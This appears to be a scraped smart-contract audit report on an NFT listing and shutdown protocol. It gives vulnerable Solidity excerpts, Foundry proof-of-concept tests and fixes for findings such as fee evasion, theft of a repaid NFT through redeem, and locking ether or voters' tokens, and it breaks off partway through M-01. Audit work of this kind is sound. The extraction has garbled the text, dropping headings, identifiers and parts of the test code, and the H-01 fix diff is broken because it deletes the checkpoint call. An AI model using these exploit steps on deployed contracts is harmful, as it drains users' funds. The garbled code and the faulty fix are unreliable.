Severity | Title |
H-01 | User can pay less protected listing fees. |
H-02 | User can unlock protected listing without paying any fee. |
H-03 | TaxCalculator.calculateCompoundedFactor() function inflate the compounded factor by 10 times. |
H-04 | Attacker can lock all ethers after shutdown executed and collection liquidation completed. |
H-05 | Listings.relist() function doesn't set listing.created as block.timestamp . |
H-06 | User can avoid protected listing fee. |
H-07 | Attacker can take out user's repaid protected listing NFT with only 1 ether . |
H-08 | Attacker can lock shutdown voters' collectionTokens forever. |
M-01 | Attacker can disable CollectionShutdown.preventShutdown() function. |
M-02 | User may lose fund when modify listings. |
M-03 | Beneficiary will lose unclaimed fees. |
function create checkpoint after decrease listingCount[_collection]
Therefore, when user unlock multiple protected listings, user will pay less fees for the second and thereafter listings than the first listing.
function is following.
function unlockProtectedListing(address _collection, uint _tokenId, bool _withdraw) public lockerNotPaused {
// Ensure this is a protected listing
ProtectedListing memory listing = _protectedListings[_collection][_tokenId];
// Ensure the caller owns the listing
if (listing.owner != msg.sender) revert CallerIsNotOwner(listing.owner);
// Ensure that the protected listing has run out of collateral
int collateral = getProtectedListingHealth(_collection, _tokenId);
if (collateral < 0) revert InsufficientCollateral();
// cache
ICollectionToken collectionToken = locker.collectionToken(_collection);
uint denomination = collectionToken.denomination();
uint96 tokenTaken = _protectedListings[_collection][_tokenId].tokenTaken;
// Repay the loaned amount, plus a fee from lock duration
uint fee = unlockPrice(_collection, _tokenId) * 10 ** denomination;
collectionToken.burnFrom(msg.sender, fee);
// We need to burn the amount that was paid into the Listings contract
collectionToken.burn((1 ether - tokenTaken) * 10 ** denomination);
// Remove our listing type
311: unchecked { --listingCount[_collection]; }
// Delete the listing objects
delete _protectedListings[_collection][_tokenId];
// Transfer the listing ERC721 back to the user
if (_withdraw) {
locker.withdrawToken(_collection, _tokenId, msg.sender);
emit ListingAssetWithdraw(_collection, _tokenId);
} else {
canWithdrawAsset[_collection][_tokenId] = msg.sender;
// Update our checkpoint to reflect that listings have been removed
325: _createCheckpoint(_collection);
// Emit an event
emit ListingUnlocked(_collection, _tokenId, fee);
As can be seen, the above function decrease listingCount[_collection]
in L311
before creating checkpoint in L325
However, creating checkpoint uses utilization rate and the utilization rate depends on listingCount[_collection]
Since listingCount[_collection]
is already decreased at L311
, the utilization rate is calculated incorrect and so the checkpoint will be incorrect.
Add the following test code into ProtectedListings.t.sol
function test_unlockProtectedListingError() public {, 0);, 1);
erc721a.setApprovalForAll(address(protectedListings), true);
uint[] memory _tokenIds = new uint[](2); _tokenIds[0] = 0; _tokenIds[1] = 1;
// create protected listing for tokenId = 0 and tokenId = 1
IProtectedListings.CreateListing[] memory _listings = new IProtectedListings.CreateListing[](1);
_listings[0] = IProtectedListings.CreateListing({
collection: address(erc721a),
tokenIds: _tokenIds,
listing: IProtectedListings.ProtectedListing({
owner: payable(address(this)),
tokenTaken: 0.4 ether,
checkpoint: 0
vm.warp(block.timestamp + 7 days);
// unlock protected listing for tokenId = 0
assertEq(protectedListings.unlockPrice(address(erc721a), 0), 402485479451875840);
locker.collectionToken(address(erc721a)).approve(address(protectedListings), 402485479451875840);
protectedListings.unlockProtectedListing(address(erc721a), 0, true);
// unlock protected listing for tokenId = 0, but the unlock price for tokenId = 1 is 402055890410801920 < 402485479451875840 for tokenId = 0.
assertEq(protectedListings.unlockPrice(address(erc721a), 1), 402055890410801920);
locker.collectionToken(address(erc721a)).approve(address(protectedListings), 402055890410801920);
protectedListings.unlockProtectedListing(address(erc721a), 1, true);
In the above test code, we can see that user paid less fees for tokenId = 1 than tokenId = 0.
Users will pay less fees. It meanas loss of funds for the protocol.
Manual Review
Change the order of decreasing listingCount[_collection]
and creating checkpoint in ProtectedListings.unlockProtectedListing()
function as follows.
function unlockProtectedListing(address _collection, uint _tokenId, bool _withdraw) public lockerNotPaused {
// Ensure this is a protected listing
ProtectedListing memory listing = _protectedListings[_collection][_tokenId];
// Ensure the caller owns the listing
if (listing.owner != msg.sender) revert CallerIsNotOwner(listing.owner);
// Ensure that the protected listing has run out of collateral
int collateral = getProtectedListingHealth(_collection, _tokenId);
if (collateral < 0) revert InsufficientCollateral();
// cache
ICollectionToken collectionToken = locker.collectionToken(_collection);
uint denomination = collectionToken.denomination();
uint96 tokenTaken = _protectedListings[_collection][_tokenId].tokenTaken;
// Repay the loaned amount, plus a fee from lock duration
uint fee = unlockPrice(_collection, _tokenId) * 10 ** denomination;
collectionToken.burnFrom(msg.sender, fee);
// We need to burn the amount that was paid into the Listings contract
collectionToken.burn((1 ether - tokenTaken) * 10 ** denomination);
// Remove our listing type
-- unchecked { --listingCount[_collection]; }
// Delete the listing objects
delete _protectedListings[_collection][_tokenId];
// Transfer the listing ERC721 back to the user
if (_withdraw) {
locker.withdrawToken(_collection, _tokenId, msg.sender);
emit ListingAssetWithdraw(_collection, _tokenId);
} else {
canWithdrawAsset[_collection][_tokenId] = msg.sender;
// Update our checkpoint to reflect that listings have been removed
++ unchecked { --listingCount[_collection]; }
// Emit an event
emit ListingUnlocked(_collection, _tokenId, fee);
function adjust listing.tokenTaken
without considering compounded factor. Exploiting this vulnerability, user can unlock protected listing without paying any fee.
function is following.
function adjustPosition(address _collection, uint _tokenId, int _amount) public lockerNotPaused {
// Ensure we don't have a zero value amount
if (_amount == 0) revert NoPositionAdjustment();
// Load our protected listing
ProtectedListing memory protectedListing = _protectedListings[_collection][_tokenId];
// Make sure caller is owner
if (protectedListing.owner != msg.sender) revert CallerIsNotOwner(protectedListing.owner);
// Get the current debt of the position
int debt = getProtectedListingHealth(_collection, _tokenId);
// Calculate the absolute value of our amount
uint absAmount = uint(_amount < 0 ? -_amount : _amount);
// cache
ICollectionToken collectionToken = locker.collectionToken(_collection);
// Check if we are decreasing debt
if (_amount < 0) {
// The user should not be fully repaying the debt in this way. For this scenario,
// the owner would instead use the `unlockProtectedListing` function.
if (debt + int(absAmount) >= int(MAX_PROTECTED_TOKEN_AMOUNT)) revert IncorrectFunctionUse();
// Take tokens from the caller
absAmount * 10 ** collectionToken.denomination()
// Update the struct to reflect the new tokenTaken, protecting from overflow
399: _protectedListings[_collection][_tokenId].tokenTaken -= uint96(absAmount);
// Otherwise, the user is increasing their debt to take more token
else {
// Ensure that the user is not claiming more than the remaining collateral
if (_amount > debt) revert InsufficientCollateral();
// Release the token to the caller
absAmount * 10 ** collectionToken.denomination()
// Update the struct to reflect the new tokenTaken, protecting from overflow
413: _protectedListings[_collection][_tokenId].tokenTaken += uint96(absAmount);
emit ListingDebtAdjusted(_collection, _tokenId, _amount);
As can be seen in L399
and L413
, _protectedListings[_collection][_tokenId].tokenTaken
is updated without considering compounded factor. Exploiting this vulnerability, user can unlock protected listing without paying any fee.
Add the following test code into ProtectedListings.t.sol
function test_adjustPositionError() public {, 0);
erc721a.setApprovalForAll(address(protectedListings), true);
uint[] memory _tokenIds = new uint[](2); _tokenIds[0] = 0; _tokenIds[1] = 1;
IProtectedListings.CreateListing[] memory _listings = new IProtectedListings.CreateListing[](1);
_listings[0] = IProtectedListings.CreateListing({
collection: address(erc721a),
tokenIds: _tokenIdToArray(0),
listing: IProtectedListings.ProtectedListing({
owner: payable(address(this)),
tokenTaken: 0.4 ether,
checkpoint: 0
vm.warp(block.timestamp + 7 days);
// unlock protected listing for tokenId = 0
assertEq(protectedListings.unlockPrice(address(erc721a), 0), 402055890410801920);
locker.collectionToken(address(erc721a)).approve(address(protectedListings), 0.4 ether);
protectedListings.adjustPosition(address(erc721a), 0, -0.4 ether);
assertEq(protectedListings.unlockPrice(address(erc721a), 0), 0);
protectedListings.unlockProtectedListing(address(erc721a), 0, true);
In the above test code, we can see that unlockPrice(address(erc721a), 0)
is 402055890410801920
, but after calling adjustPosition(address(erc721a), 0, -0.4 ether)
, unlockPrice(address(erc721a), 0)
decreases to 0
. So we unlocked protected listing paying only 0.4 ether
without paying any fee.
User can unlock protected listing without paying any fee. It means loss of funds for the protocol.
On the other hand, if user increase tokenTaken
in adjustPosition()
function, increasement of fee will be inflated by compounded factor. it means loss of funds for the user.
Manual Review
Adjust tokenTaken
considering compounded factor in ProtectedListings.adjustPosition()
function. That is, divide absAmount
by compounded factor before updating tokenTaken
[H-03] TaxCalculator.calculateCompoundedFactor()
function inflate the compounded factor by 10 times.
function inflate the compounded factor by 10 times.
function is the following.
function calculateCompoundedFactor(uint _previousCompoundedFactor, uint _utilizationRate, uint _timePeriod) public view returns (uint compoundedFactor_) {
// Get our interest rate from our utilization rate
82: uint interestRate = this.calculateProtectedInterest(_utilizationRate);
// Ensure we calculate the compounded factor with correct precision. `interestRate` is
// in basis points per annum with 1e2 precision and we convert the annual rate to per
// second rate.
uint perSecondRate = (interestRate * 1e18) / (365 * 24 * 60 * 60);
// Calculate new compounded factor
90: compoundedFactor_ = _previousCompoundedFactor * (1e18 + (perSecondRate / 1000 * _timePeriod)) / 1e18;
The calculateProtectedInterest()
function of L82
is following.
* Calculates the interest rate for Protected Listings based on the utilization rate
* for the collection.
* This maps to a hockey puck style chart, with a slow increase until we reach our
* kink, which will subsequently rapidly increase the interest rate.
53: * @dev The interest rate is returned to 2 decimal places (200 = 2%)
* @param _utilizationRate The utilization rate for the collection
* @return interestRate_ The annual interest rate for the collection
function calculateProtectedInterest(uint _utilizationRate) public pure returns (uint interestRate_) {
// If we haven't reached our kink, then we can just return the base fee
if (_utilizationRate <= UTILIZATION_KINK) {
// Calculate percentage increase for input range 0 to 0.8 ether (2% to 8%)
interestRate_ = 200 + (_utilizationRate * 600) / UTILIZATION_KINK;
// If we have passed our kink value, then we need to calculate our additional fee
else {
// Convert value in the range 0.8 to 1 to the respective percentage between 8% and
// 100% and make it accurate to 2 decimal places.
interestRate_ = (((_utilizationRate - UTILIZATION_KINK) * (100 - 8)) / (1 ether - UTILIZATION_KINK) + 8) * 100;
As can be seen, the above function returns 10000
for 100%
. It can also be verified in the comments of L53
. But in L90
, the function divides the perSecondRate
by 1000
instead of 10_000
, and thus inflate the compounded factor by 10.
Users will pay 10 times more tax than they should. It means Loss of funds.
Manual Review
Modify TaxCalculator.calculateCompoundedFactor()
function as below.
function calculateCompoundedFactor(uint _previousCompoundedFactor, uint _utilizationRate, uint _timePeriod) public view returns (uint compoundedFactor_) {
// Get our interest rate from our utilization rate
uint interestRate = this.calculateProtectedInterest(_utilizationRate);
// Ensure we calculate the compounded factor with correct precision. `interestRate` is
// in basis points per annum with 1e2 precision and we convert the annual rate to per
// second rate.
uint perSecondRate = (interestRate * 1e18) / (365 * 24 * 60 * 60);
// Calculate new compounded factor
-- compoundedFactor_ = _previousCompoundedFactor * (1e18 + (perSecondRate / 1000 * _timePeriod)) / 1e18;
++ compoundedFactor_ = _previousCompoundedFactor * (1e18 + (perSecondRate * _timePeriod / 10000)) / 1e18;
When there are less than MAX_SHUTDOWN_TOKENS
collection NFTs in the protocol, there will be shutdown vote. If totalSupply exceeds MAX_SHUTDOWN_TOKENS
, after shutdown executed, attacker can cancel votes and lock all ethers into the contract forever.
At first, the CollectionShutdown.execute()
function is following.
function execute(address _collection, uint[] calldata _tokenIds) public onlyOwner whenNotPaused {
// Ensure that the vote count has reached quorum
CollectionShutdownParams storage params = _collectionParams[_collection];
if (!params.canExecute) revert ShutdownNotReachedQuorum();
// Ensure we have specified token IDs
uint _tokenIdsLength = _tokenIds.length;
if (_tokenIdsLength == 0) revert NoNFTsSupplied();
// Check that no listings currently exist
if (_hasListings(_collection)) revert ListingsExist();
// Refresh total supply here to ensure that any assets that were added during
// the shutdown process can also claim their share.
uint newQuorum = params.collectionToken.totalSupply() * SHUTDOWN_QUORUM_PERCENT / ONE_HUNDRED_PERCENT;
if (params.quorumVotes != newQuorum) {
params.quorumVotes = uint88(newQuorum);
// Lockdown the collection to prevent any new interaction
// Iterate over our token IDs and transfer them to this contract
IERC721 collection = IERC721(_collection);
for (uint i; i < _tokenIdsLength; ++i) {
locker.withdrawToken(_collection, _tokenIds[i], address(this));
// Approve sudoswap pair factory to use our NFTs
collection.setApprovalForAll(address(pairFactory), true);
// Map our collection to a newly created pair
address pool = _createSudoswapPool(collection, _tokenIds);
// Set the token IDs that have been sent to our sweeper pool
params.sweeperPoolTokenIds = _tokenIds;
sweeperPoolCollection[pool] = _collection;
// Update our collection parameters with the pool
params.sweeperPool = pool;
// Prevent the collection from being executed again
273: params.canExecute = false;
emit CollectionShutdownExecuted(_collection, pool, _tokenIds);
As can be seen, admin can execute shutdown vote even if totalSupply exceeds MAX_SHUTDOWN_TOKENS
. Also, the above function change the params.canExecute
to false
in L273
after shutdown executed.
Next, the CollectionShutdown._vote()
function is following.
function _vote(address _collection, CollectionShutdownParams memory params) internal returns (CollectionShutdownParams memory) {
// Take tokens from the user and hold them in this escrow contract
uint userVotes = params.collectionToken.balanceOf(msg.sender);
if (userVotes == 0) revert UserHoldsNoTokens();
// Pull our tokens in from the user
params.collectionToken.transferFrom(msg.sender, address(this), userVotes);
// Register the amount of votes sent as a whole, and store them against the user
params.shutdownVotes += uint96(userVotes);
// Register the amount of votes for the collection against the user
unchecked { shutdownVoters[_collection][msg.sender] += userVotes; }
emit CollectionShutdownVote(_collection, msg.sender, userVotes);
// If we can execute, then we need to fire another event
if (!params.canExecute && params.shutdownVotes >= params.quorumVotes) {
209: params.canExecute = true;
emit CollectionShutdownQuorumReached(_collection);
return params;
As can be seen, the above function doesn't check if vote has already executed, so attacker can vote using only 1 wei even after vote executed, and can change params.canExecute
to true
again in L209
After that, attacker can call CollectionShutdown.cancel()
function and delete _collectionParams[_collection]
- Assume that
is 1 and totalSupplay of a collection areMAX_SHUTDOWN_TOKENS = 4 ethers
. - Shutdown vote starts and the votes can execute since total votes are larger than quorum threshold.
- TotalSupply increases again and exceeds
for some reason. - Admin executes shutdown vote and transfer all NFTs of Locker to sweeper pool and swap them to ethers.
- Attacker votes using only 1 wei collectionToken (which he can buy in uniswap pool) and change
again. - Attacker calls
function and delete_collectionParams[_collection]
totally. - After collection liquidation completed, all protocol users can't claim ethers for their collectionTokens because
is deleted.
Attacker can lock all ethers using only 1 wei collectionToken after shutdownn executed and collection liquidation completed. Here, not only voters but also other users can't claim ethers for their collectionToken holdings.
Manual Review
Add check if vote has already executed into the CollectionShutdown._vote()
function doesn't set listing.created
as block.timestamp
It causes several serious problems to the user.
function set listing.created
as block.timestamp
but the following Listings.relist()
function doesn't set listing.created
as block.timestamp
function relist(CreateListing calldata _listing, bool _payTaxWithEscrow) public nonReentrant lockerNotPaused {
// Load our tokenId
address _collection = _listing.collection;
uint _tokenId = _listing.tokenIds[0];
// Read the existing listing in a single read
Listing memory oldListing = _listings[_collection][_tokenId];
// Ensure the caller is not the owner of the listing
if (oldListing.owner == msg.sender) revert CallerIsAlreadyOwner();
// Load our new Listing into memory
Listing memory listing = _listing.listing;
// Ensure that the existing listing is available
(bool isAvailable, uint listingPrice) = getListingPrice(_collection, _tokenId);
if (!isAvailable) revert ListingNotAvailable();
// We can process a tax refund for the existing listing
(uint _fees,) = _resolveListingTax(oldListing, _collection, true);
if (_fees != 0) {
emit ListingFeeCaptured(_collection, _tokenId, _fees);
// Find the underlying {CollectionToken} attached to our collection
ICollectionToken collectionToken = locker.collectionToken(_collection);
// If the floor multiple of the original listings is different, then this needs
// to be paid to the original owner of the listing.
uint listingFloorPrice = 1 ether * 10 ** collectionToken.denomination();
if (listingPrice > listingFloorPrice) {
unchecked {
collectionToken.transferFrom(msg.sender, oldListing.owner, listingPrice - listingFloorPrice);
// Validate our new listing
// Store our listing into our Listing mappings
665: _listings[_collection][_tokenId] = listing;
// Pay our required taxes
668: payTaxWithEscrow(address(collectionToken), getListingTaxRequired(listing, _collection), _payTaxWithEscrow);
// Emit events
emit ListingRelisted(_collection, _tokenId, listing);
As can be seen, the above function doesn't set _listings[_collection][_tokenId].created
as block.timestamp
in L665
. Although the test codes of Listings.t.sol
are setting listing.created
as block.timestamp
when calling Listings.relist()
function, users can set listing.created
arbitrarily when calling Listings.relist()
Even in the case that user (or frontend) try to set listing.created
as block.timestamp
, since the user's tx will be stayed in mempool for unexpected period, listing.created
will be different with block.timestamp
If listing.created
is before than block.timestamp
, user will lose part of tax required for relisting (which is paid in L668
). If listing.created
is much smaller than block.timestamp
, user's NFT will be auctioned at low price as soon as it is relisted.
If listing.created
is greater than block.timestamp
, user's NFT can't be filled for a period from block.timestamp
to listing.created
User will lose the tax required for relisting or user's NFT listing will be auctioned at low price. It means loss of funds. User's NFT listing can't be filled for a period. It means lock of funds.
Manual Review
Modify Listings.relist()
function as below.
function relist(CreateListing calldata _listing, bool _payTaxWithEscrow) public nonReentrant lockerNotPaused {
--- SKIP ---
// Load our new Listing into memory
Listing memory listing = _listing.listing;
++ listing.created = block.timestamp;
--- SKIP ---
function returns incorrect index when the timestamp of last checkpoint is equal to block.timestamp
. Exploiting this vulnerability, user can avoid protected listing fee.
function is following.
function createListings(CreateListing[] calldata _createListings) public nonReentrant lockerNotPaused {
// Loop variables
uint checkpointIndex;
bytes32 checkpointKey;
uint tokensIdsLength;
uint tokensReceived;
// Loop over the unique listing structures
for (uint i; i < _createListings.length; ++i) {
// Store our listing for cheaper access
CreateListing calldata listing = _createListings[i];
// Ensure our listing will be valid
// Update our checkpoint for the collection if it has not been done yet for
// the listing collection.
checkpointKey = keccak256(abi.encodePacked('checkpointIndex', listing.collection));
assembly { checkpointIndex := tload(checkpointKey) }
if (checkpointIndex == 0) {
137: checkpointIndex = _createCheckpoint(listing.collection);
assembly { tstore(checkpointKey, checkpointIndex) }
// Map our listings
tokensIdsLength = listing.tokenIds.length;
tokensReceived = _mapListings(listing, tokensIdsLength, checkpointIndex) * 10 ** locker.collectionToken(listing.collection).denomination();
// Register our listing type
unchecked {
listingCount[listing.collection] += tokensIdsLength;
// Deposit the tokens into the locker and distribute ERC20 to user
_depositNftsAndReceiveTokens(listing, tokensReceived);
// Event fire
emit ListingsCreated(listing.collection, listing.tokenIds, listing.listing, tokensReceived, msg.sender);
The above function get the last checkpoint index of the collection on L137
and save it to calculate the compound factor in unlockPrice()
function is following.
function _createCheckpoint(address _collection) internal returns (uint index_) {
// Determine the index that will be created
index_ = collectionCheckpoints[_collection].length;
// Register the checkpoint that has been created
emit CheckpointCreated(_collection, index_);
// If this is our first checkpoint, then our logic will be different as we won't have
// a previous checkpoint to compare against and we don't want to underflow the index.
if (index_ == 0) {
// Calculate the current interest rate based on utilization
(, uint _utilizationRate) = utilizationRate(_collection);
// We don't have a previous checkpoint to calculate against, so we initiate our
// first checkpoint with base data.
compoundedFactor: locker.taxCalculator().calculateCompoundedFactor({
_previousCompoundedFactor: 1e18,
_utilizationRate: _utilizationRate,
_timePeriod: 0
timestamp: block.timestamp
return index_;
// Get our new (current) checkpoint
Checkpoint memory checkpoint = _currentCheckpoint(_collection);
// If no time has passed in our new checkpoint, then we just need to update the
// utilization rate of the existing checkpoint.
if (checkpoint.timestamp == collectionCheckpoints[_collection][index_ - 1].timestamp) {
collectionCheckpoints[_collection][index_ - 1].compoundedFactor = checkpoint.compoundedFactor;
566: return index_; // @audit index is out-of-bound of collectionCheckpoints[_collection]
// Store the new (current) checkpoint
As can be seen in L566
, the above function returns last index of collectionCheckpoints[_collection]
+ 1
when the timestamp of last checkpoint is equal to block.timestamp
. Exploiting this vulnerability, user can avoid protected listing fee.
Add the following test code into ProtectedListings.t.sol
function test_CreateListingsError() public {, 0);, 1);
erc721a.setApprovalForAll(address(protectedListings), true);
erc721b.setApprovalForAll(address(protectedListings), true);
// create listing for tokenId = 0
IProtectedListings.CreateListing[] memory _listings = new IProtectedListings.CreateListing[](1);
_listings[0] = IProtectedListings.CreateListing({
collection: address(erc721a),
tokenIds: _tokenIdToArray(0),
listing: IProtectedListings.ProtectedListing({
owner: payable(address(this)),
tokenTaken: 0.4 ether,
checkpoint: 0
// create listing for tokenId = 1 within the same block
_listings[0].tokenIds = _tokenIdToArray(1);
vm.warp(block.timestamp + 7 days);
// unlock price for tokenId = 0 is increased.
assertEq(protectedListings.unlockPrice(address(erc721a), 0), 402485479451875840);
// ulockPrice() for tokenId = 1 will revert because of out-of-bound access.
protectedListings.unlockPrice(address(erc721a), 1);
// unlock price for tokenId = 1 is not increased at all.
assertEq(protectedListings.unlockPrice(address(erc721a), 1), 0.4 ether);
In the above test code, user avoid fees for tokenId = 1 by creating the listing for tokenId = 1 within the same block for tokenId = 0.
User can avoid protected listing fee. It meanas loss of funds for the protocol.
Manual Review
Modify ProtectedListings._createCheckpoint()
function as below.
function _createCheckpoint(address _collection) internal returns (uint index_) {
// Determine the index that will be created
index_ = collectionCheckpoints[_collection].length;
// Register the checkpoint that has been created
emit CheckpointCreated(_collection, index_);
// If this is our first checkpoint, then our logic will be different as we won't have
// a previous checkpoint to compare against and we don't want to underflow the index.
if (index_ == 0) {
// Calculate the current interest rate based on utilization
(, uint _utilizationRate) = utilizationRate(_collection);
// We don't have a previous checkpoint to calculate against, so we initiate our
// first checkpoint with base data.
compoundedFactor: locker.taxCalculator().calculateCompoundedFactor({
_previousCompoundedFactor: 1e18,
_utilizationRate: _utilizationRate,
_timePeriod: 0
timestamp: block.timestamp
return index_;
// Get our new (current) checkpoint
Checkpoint memory checkpoint = _currentCheckpoint(_collection);
// If no time has passed in our new checkpoint, then we just need to update the
// utilization rate of the existing checkpoint.
if (checkpoint.timestamp == collectionCheckpoints[_collection][index_ - 1].timestamp) {
collectionCheckpoints[_collection][index_ - 1].compoundedFactor = checkpoint.compoundedFactor;
-- return index_;
++ return index_ - 1;
// Store the new (current) checkpoint
function deletes _protectedListings[_collection][_tokenId]
while not withdraw it from Locker
when _withdraw
parameter is false
. Therefore, attacker can take out user's repaid protected listing NFT with only 1 ether
before user withdraw it.
function is following.
function unlockProtectedListing(address _collection, uint _tokenId, bool _withdraw) public lockerNotPaused {
// Ensure this is a protected listing
ProtectedListing memory listing = _protectedListings[_collection][_tokenId];
// Ensure the caller owns the listing
if (listing.owner != msg.sender) revert CallerIsNotOwner(listing.owner);
// Ensure that the protected listing has run out of collateral
int collateral = getProtectedListingHealth(_collection, _tokenId);
if (collateral < 0) revert InsufficientCollateral();
// cache
ICollectionToken collectionToken = locker.collectionToken(_collection);
uint denomination = collectionToken.denomination();
uint96 tokenTaken = _protectedListings[_collection][_tokenId].tokenTaken;
// Repay the loaned amount, plus a fee from lock duration
uint fee = unlockPrice(_collection, _tokenId) * 10 ** denomination;
collectionToken.burnFrom(msg.sender, fee);
// We need to burn the amount that was paid into the Listings contract
collectionToken.burn((1 ether - tokenTaken) * 10 ** denomination);
// Remove our listing type
unchecked { --listingCount[_collection]; }
// Delete the listing objects
314: delete _protectedListings[_collection][_tokenId];
// Transfer the listing ERC721 back to the user
if (_withdraw) {
locker.withdrawToken(_collection, _tokenId, msg.sender);
emit ListingAssetWithdraw(_collection, _tokenId);
} else {
canWithdrawAsset[_collection][_tokenId] = msg.sender;
// Update our checkpoint to reflect that listings have been removed
// Emit an event
emit ListingUnlocked(_collection, _tokenId, fee);
The above function doesn't withdraw NFT when _withdraw
parameter is false
, but deletes _protectedListings[_collection][_tokenId]
in L314
In the meantime, Locker.redeem()
function is following.
function redeem(address _collection, uint[] calldata _tokenIds, address _recipient) public nonReentrant whenNotPaused collectionExists(_collection) {
uint tokenIdsLength = _tokenIds.length;
if (tokenIdsLength == 0) revert NoTokenIds();
// Burn the ERC20 tokens from the caller
ICollectionToken collectionToken_ = _collectionToken[_collection];
collectionToken_.burnFrom(msg.sender, tokenIdsLength * 1 ether * 10 ** collectionToken_.denomination());
// Define our collection token outside the loop
IERC721 collection = IERC721(_collection);
// Loop through the tokenIds and redeem them
for (uint i; i < tokenIdsLength; ++i) {
// Ensure that the token requested is not a listing
223: if (isListing(_collection, _tokenIds[i])) revert TokenIsListing(_tokenIds[i]);
// Transfer the collection token to the caller
collection.transferFrom(address(this), _recipient, _tokenIds[i]);
emit TokenRedeem(_collection, _tokenIds, msg.sender, _recipient);
function of L223
is following.
function isListing(address _collection, uint _tokenId) public view returns (bool) {
IListings _listings = listings;
// Check if we have a liquid or dutch listing
if (_listings.listings(_collection, _tokenId).owner != address(0)) {
return true;
// Check if we have a protected listing
447: if (_listings.protectedListings().listings(_collection, _tokenId).owner != address(0)) {
return true;
return false;
Since _protectedListings[_collection][_tokenId]
is already deleted in ProtectedListings.sol#L314
, the condition of L447
is false
and isListing()
function returns false
. Therefore, attacker can take out user's repaid protected listing NFT by calling Locker.redeem()
Add the following test code into ProtectedListings.t.sol
function test_withdrawProtectedListingError() public {, 0);
erc721a.setApprovalForAll(address(protectedListings), true);
uint[] memory _tokenIds = new uint[](2); _tokenIds[0] = 0; _tokenIds[1] = 1;
// create protected listing for tokenId = 0
IProtectedListings.CreateListing[] memory _listings = new IProtectedListings.CreateListing[](1);
_listings[0] = IProtectedListings.CreateListing({
collection: address(erc721a),
tokenIds: _tokenIdToArray(0),
listing: IProtectedListings.ProtectedListing({
owner: payable(address(this)),
tokenTaken: 0.4 ether,
checkpoint: 0
vm.warp(block.timestamp + 7 days);
// attacker can't take out protected listing
locker.collectionToken(address(erc721a)).approve(address(locker), 1 ether);
locker.redeem(address(erc721a), _tokenIdToArray(0), address(this));
// user unlock protected listing without withdrawing
locker.collectionToken(address(erc721a)).approve(address(protectedListings), 402055890410801920);
protectedListings.unlockProtectedListing(address(erc721a), 0, false);
// attacker can take out protected listing with only 1 ether
locker.redeem(address(erc721a), _tokenIdToArray(0), address(this));
// user lost his NFT
protectedListings.withdrawProtectedListing(address(erc721a), 0);
As can be seen above, attacker can take out user's repaid protected listing NFT with only 1 ether
before user withdraw it.
In general, the price of protected listing NFT will be more than 1 ether
. However, attacker can take out user's repaid protected listing NFT with only 1 ether
. This means loss of funds for user.
Manual Review
Don't delete _protectedListings[_collection][_tokenId]
when _withdraw
parameter is false
. And then delete it in the ProtectedListings.withdrawProtectedListing()
When there are less than MAX_SHUTDOWN_TOKENS
collection NFTs in the protocol, there will be shutdown vote. When shutdown vote exceeds quorum threshold and can execute, attacker can deposit NFTs to increase totalSupply of collectionTokens and cancel vote. As a result, voters' collectionTokens will be locked forever.
The CollectionShutdown.cancel()
function is following.
function cancel(address _collection) public whenNotPaused {
// Ensure that the vote count has reached quorum
CollectionShutdownParams memory params = _collectionParams[_collection];
if (!params.canExecute) revert ShutdownNotReachedQuorum();
// Check if the total supply has surpassed an amount of the initial required
// total supply. This would indicate that a collection has grown since the
// initial shutdown was triggered and could result in an unsuspected liquidation.
if (params.collectionToken.totalSupply() <= MAX_SHUTDOWN_TOKENS * 10 ** locker.collectionToken(_collection).denomination()) {
revert InsufficientTotalSupplyToCancel();
// Remove our execution flag
403: delete _collectionParams[_collection];
emit CollectionShutdownCancelled(_collection);
As can be seen, the above function deletes the _collectionParams[_collection]
in L403
when totalSupply is larger than MAX_SHUTDOWN_TOKENS
After shudown vote is canceled, voters should reclaim their votes to refund their voted collectionTokens. However, CollectionShutdown.reclaimVote()
function is following.
function reclaimVote(address _collection) public whenNotPaused {
// If the quorum has passed, then we can no longer reclaim as we are pending
// an execution.
CollectionShutdownParams storage params = _collectionParams[_collection];
if (params.canExecute) revert ShutdownQuorumHasPassed();
// Get the amount of votes that the user has cast for this collection
uint userVotes = shutdownVoters[_collection][msg.sender];
// If the user has not cast a vote, then we can revert early
if (userVotes == 0) revert NoVotesPlacedYet();
// We delete the votes that the user has attributed to the collection
369: params.shutdownVotes -= uint96(userVotes);
delete shutdownVoters[_collection][msg.sender];
// We can now return their tokens
373: params.collectionToken.transfer(msg.sender, userVotes);
// Notify our stalkers that a vote has been reclaimed
emit CollectionShutdownVoteReclaim(_collection, msg.sender, userVotes);
As can be seen, since _collectionParams[_collection]
has been deleted, the above function will revert at L369
and L373
As a result, voters' collectionTokens will be locked in the CollectionShutdown
- Assume that
is 1 and totalSupplay of a collection areMAX_SHUTDOWN_TOKENS = 4 ethers
. - Shutdown vote starts and the votes can execute since total votes are larger than quorum threshold.
- Attacker deposits 1 NFT to the collection and cancel shutdown vote.
- Voters' collectionTokens will be locked since they can't reclaim their votes.
- Attacker can redeem his NFT if necessary.
Attacker can lock shutdown voters' collectionTokens without any risk and loss. Since majority amount of collectionTokens are locked, new shutdown vote can't execute again. Therefore, the voters' collectionTokens will be locked forever.
Manual Review
Add a function to reclaim votes in the case of canceling shutdown vote.
The protocol has function of preventing shudown for a certain collection by admin.
However, attacker can start shutdown by calling CollectionShutdown.start()
function with only 1 wei before admin calls CollectionShutdown.preventShutdown()
The following CollectionShutdown.preventShudown()
function will revert if shutdown is already in progress.
function preventShutdown(address _collection, bool _prevent) public {
// Make sure our user is a locker manager
if (!locker.lockerManager().isManager(msg.sender)) revert ILocker.CallerIsNotManager();
// Make sure that there isn't currently a shutdown in progress
@> if (_collectionParams[_collection].shutdownVotes != 0) revert ShutdownProcessAlreadyStarted();
// Update the shutdown to be prevented
shutdownPrevented[_collection] = _prevent;
emit CollectionShutdownPrevention(_collection, _prevent);
On the other hand, the following CollectionShutdown.start()
function can be called and succeeded before the collection is initialized by Locker.initializeCollection()
function start(address _collection) public whenNotPaused {
// Confirm that this collection is not prevented from being shutdown
if (shutdownPrevented[_collection]) revert ShutdownPrevented();
// Ensure that a shutdown process is not already actioned
CollectionShutdownParams memory params = _collectionParams[_collection];
if (params.shutdownVotes != 0) revert ShutdownProcessAlreadyStarted();
// Get the total number of tokens still in circulation, specifying a maximum number
// of tokens that can be present in a "dormant" collection.
params.collectionToken = locker.collectionToken(_collection);
uint totalSupply = params.collectionToken.totalSupply();
147: if (totalSupply > MAX_SHUTDOWN_TOKENS * 10 ** params.collectionToken.denomination()) revert TooManyItems();
// Set our quorum vote requirement
params.quorumVotes = uint88(totalSupply * SHUTDOWN_QUORUM_PERCENT / ONE_HUNDRED_PERCENT);
